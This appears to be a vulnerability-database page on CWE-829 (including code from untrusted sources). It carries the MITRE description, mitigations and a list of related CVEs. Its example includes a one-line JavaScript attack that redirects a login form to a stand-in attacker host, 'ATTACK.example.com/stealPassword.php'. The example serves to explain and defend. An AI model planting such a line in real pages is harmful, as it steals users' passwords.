Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-829 (从非可信控制范围包含功能例程) — Vulnerability Class 110

110 vulnerabilities classified as CWE-829 (从非可信控制范围包含功能例程). AI Chinese analysis included.

CWE-829 represents a critical software weakness where applications import or execute functionality from sources outside their intended control sphere, such as unverified third-party libraries or external APIs. Attackers typically exploit this vulnerability by compromising the external source or manipulating the inclusion mechanism to inject malicious code, thereby gaining unauthorized execution privileges or causing system compromise. This often occurs when developers blindly trust dependencies without verifying their integrity or origin. To mitigate this risk, developers must implement strict dependency management practices, including rigorous code review processes and the use of cryptographic signatures to verify the authenticity of included components. Additionally, employing sandboxing techniques and maintaining a minimal attack surface by removing unnecessary external dependencies can significantly reduce the likelihood of successful exploitation, ensuring that only trusted, vetted functionality is integrated into the application’s core logic.

MITRE CWE Description
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
Common Consequences (1)
Confidentiality, Integrity, AvailabilityExecute Unauthorized Code or Commands
An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. This could enable the injection of malware, information exposure by granting excessive privileges or…
Mitigations (5)
Architecture and DesignUse a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Architecture and DesignWhen the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Architecture and DesignFor any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design, OperationRun the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited
Architecture and Design, OperationRun your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
Examples (1)
This login webpage includes a weather widget from an external website:
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>
Bad · HTML
...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";
Attack · JavaScript
CVE IDTitleCVSSSeverityPublished
CVE-2025-49809 mtr 安全漏洞 — mtr 7.8 High2025-07-04
CVE-2025-32463 Sudo 安全漏洞 — Sudo 9.3 Critical2025-06-30
CVE-2025-36852 Build Cache Poisoning via Untrusted Pull Requests — Azure Based Remote Cache Plugin for Nx 6.8AIMediumAI2025-06-10
CVE-2024-52976 Elastic Agent Inclusion of Functionality from Untrusted Control Sphere — Elastic Agent 4.4 Medium2025-05-01
CVE-2025-20236 Cisco Webex App Client-Side Remote Code Execution Vulnerability — Cisco Webex Teams 8.8 High2025-04-16
CVE-2024-45482 Privilege escalation in B&R APROL — B&R APROL 7.8AIHighAI2025-03-25
CVE-2025-27607 Python JSON Logger has a Potential RCE via missing `msgspec-python313-pre` dependency — python-json-logger 8.8 High2025-03-07
CVE-2025-24796 Remote Code Execution within Collabora Online jail with Macros Enabled — online 9.8 -2025-03-06
CVE-2025-27510 RCE in the package conda-forge-metadata — conda-forge-metadata 9.8 -2025-03-04
CVE-2025-0982 Sandbox Escape in Google Cloud Application Integration's JavaScript Task (Rhino Engine) — Application Integration 10.0 -2025-02-06
CVE-2022-49038 Synology Drive 安全漏洞 — Synology Drive Client 7.8 High2024-09-26
CVE-2024-43690 Gallagher Command Centre Server 安全漏洞 — Command Centre Server 8.0 High2024-09-11
CVE-2024-29073 Ankitects Anki 安全漏洞 — Anki 5.3 Medium2024-07-22
CVE-2024-38537 Inclusion of Untrusted polyfill.io Code Vulnerability in fides.js — fides--2024-07-02
CVE-2024-38476 Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect — Apache HTTP Server 9.1AICriticalAI2024-07-01
CVE-2024-3043 Zigbee co-ordinator realignment packet may lead to denial of service — Ember ZNet SDK 7.5 High2024-06-27
CVE-2023-49133 TP-LINK AC1350 安全漏洞 — AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) 8.1 High2024-04-09
CVE-2023-49134 TP-LINK AC1350 安全漏洞 — AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) 8.1 High2024-04-09
CVE-2024-28184 WeasyPrint allows the attachment of arbitrary files and URLs to a PDF — WeasyPrint 7.4 High2024-03-09
CVE-2024-24821 Code execution and possible privilege escalation via compromised InstalledVersions.php or installed.php in Composer — composer 8.8 High2024-02-08
CVE-2022-31021 Unlinkability broken in ursa when verifiers use malicious keys — ursa 3.3 Low2024-01-16
CVE-2023-4591 Inclusion of Functionality from Untrusted Control Sphere in WPN-XM Serverstack — Serverstack 7.5 High2023-11-03
CVE-2023-45798 Yettiesoft VestCert Remote Code Execution Vulnerability — VestCert 8.4 High2023-10-30
CVE-2023-5523 M-Files Web Companion allows Remote Code Execution — Web Companion 8.6 High2023-10-20
CVE-2023-41267 Apache HDFS Provider error message suggested installation of incorrect pip package — Apache Airflow HDFS Provider 8.8 -2023-09-14
CVE-2023-2453 Local file Inclusion (LFI) in Forum Infusion via Directory Traversal — PHPFusion 8.8 High2023-09-05
CVE-2023-31170 Inclusion of Functionality from Untrusted Control Sphere — SEL-5030 acSELerator QuickSet Software 5.9 Medium2023-08-31
CVE-2023-31168 Inclusion of Functionality from Untrusted Control Sphere — SEL-5030 acSELerator QuickSet Software 5.5 Medium2023-08-31
CVE-2023-36609 Ovarro TBox RTUs 安全漏洞 — TBox MS-CPU32 7.2 High2023-07-03
CVE-2022-46302 Remote Code Execution with Root Privileges via Broad Apache Permissions — Checkmk 8.8 High2023-04-20

Vulnerabilities classified as CWE-829 (从非可信控制范围包含功能例程) represent 110 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.